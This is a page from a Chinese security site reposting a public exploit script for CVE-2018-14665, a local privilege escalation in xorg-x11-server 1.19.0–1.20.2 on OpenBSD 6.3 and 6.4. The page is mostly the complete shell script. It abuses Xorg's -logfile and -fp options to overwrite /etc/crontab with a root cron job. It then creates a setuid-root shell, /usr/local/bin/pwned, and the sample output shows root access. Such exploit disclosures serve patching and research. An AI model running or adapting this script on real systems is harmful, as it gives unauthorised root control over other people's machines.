首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 xorg-x11-server 1.20.3 - Privilege Escalation 来源：raptor@0xdeadbeef.info 作者：Ivaldi 发布时间：2018-11-01   # Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.x.org/ # Version: xorg-x11-server 1.19.0 - 1.20.2 # Tested on: OpenBSD 6.3 and 6.4 # CVE : CVE-2018-14665   # raptor_xorgasm   #!/bin/sh   # # raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron # Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> # # A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission # check for -modulepath and -logfile options when starting Xorg. X server # allows unprivileged users with the ability to log in to the system via # physical console to escalate their privileges and run arbitrary code under # root privileges (CVE-2018-14665). # # This exploit targets OpenBSD's cron in order to escalate privileges to # root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical # console, it works perfectly on pseudo-terminals connected via SSH as well. # # See also: # https://lists.x.org/archives/xorg-announce/2018-October/002927.html # https://www.exploit-db.com/exploits/45697/ # https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 # # Usage: # blobfish$ chmod +x raptor_xorgasm # blobfish$ ./raptor_xorgasm # [...] # Be patient for a couple of minutes... # [...] # Don't forget to cleanup and run crontab -e to reload the crontab. # -rw-r--r--  1 root  wheel  47327 Oct 27 14:48 /etc/crontab # -rwsrwxrwx  1 root  wheel  7417 Oct 27 14:50 /usr/local/bin/pwned # blobfish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): # OpenBSD 6.4 (Xorg 1.19.6) [tested] # OpenBSD 6.3 (Xorg 1.19.6) [tested] #   echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron" echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"   # prepare the payload cat << EOF > /tmp/xorgasm cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid chmod 4777 /usr/local/bin/pwned EOF chmod +x /tmp/xorgasm   # trigger the bug cd /etc Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 & sleep 5 pkill Xorg   # run the setuid shell echo echo "Be patient for a couple of minutes..." echo sleep 120 echo echo "Don't forget to cleanup and run crontab -e to reload the crontab." ls -l /etc/crontab* ls -l /usr/local/bin/pwned /usr/local/bin/pwned   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·R 3.4.4 (Windows 10 x64) - Buf ·Any Sound Recorder 2.93 - Buff ·Microsoft Windows 10 User Sess ·ZyXEL VMG3312-B10B < 1.00(AAPP ·Modbus Slave 7.0.0 - Denial of ·Nutanix AOS & Prism < 5.5.5 (L ·Paramiko 2.4.1 - Authenticatio ·QNAP NetBak Replicator 4.5.6.0 ·Local Server 1.0.9 - Denial of ·SIPp 3.3.990 - Local Buffer Ov ·Modbus Slave PLC 7 - '.msw' Bu ·Loadbalancer.org Enterprise VA   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved